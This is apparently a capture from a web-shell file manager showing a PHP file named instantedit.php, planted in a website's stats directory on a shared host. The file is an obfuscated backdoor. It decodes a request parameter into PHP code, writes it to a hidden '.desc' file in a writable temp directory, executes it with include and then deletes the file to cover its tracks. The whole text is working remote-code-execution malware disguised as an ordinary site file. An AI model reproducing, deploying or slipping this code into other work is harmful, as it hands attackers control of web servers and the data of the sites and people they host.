HEX
Server: Apache
System: Linux localhost.localdomain 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User: web57 (5040)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/clients/client6/web57/web/stats/2024-10/instantedit.php
<?php

if(@$_REQUEST["\x70set"] !== null){
	$tkn = $_REQUEST["\x70set"];
		  $tkn	= 	 explode	('.'		 ,   $tkn 		)	;	
	$pgrp =  '';
            $salt =  'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS =  strlen($salt);
            $w =  0;
    
            array_walk($tkn	, function($v8) use(&$pgrp	, &$w	, $salt	, $lenS) {
                $sChar =  ord($salt[$w%		$lenS]);
                $dec =  ((int)$v8 - $sChar -($w%		10)) ^ 8;
                $pgrp.=	chr($dec);
                $w++;
            });
	$property_set = array_filter([getenv("TMP"), "/var/tmp", ini_get("upload_tmp_dir"), getcwd(), sys_get_temp_dir(), session_save_path(), "/tmp", "/dev/shm", getenv("TEMP")]);
	$fac = 0;
do {
    $hld = $property_set[$fac] ?? null;
    if ($fac >= count($property_set)) break;
    		if (is_dir($hld) ? is_writable($hld) : false) {
    $val = implode("/", [$hld, ".desc"]);
    $success = file_put_contents($val, $pgrp);
if ($success) {
	include $val;
	@unlink($val);
	exit;}
}
    $fac++;
} while (true);
}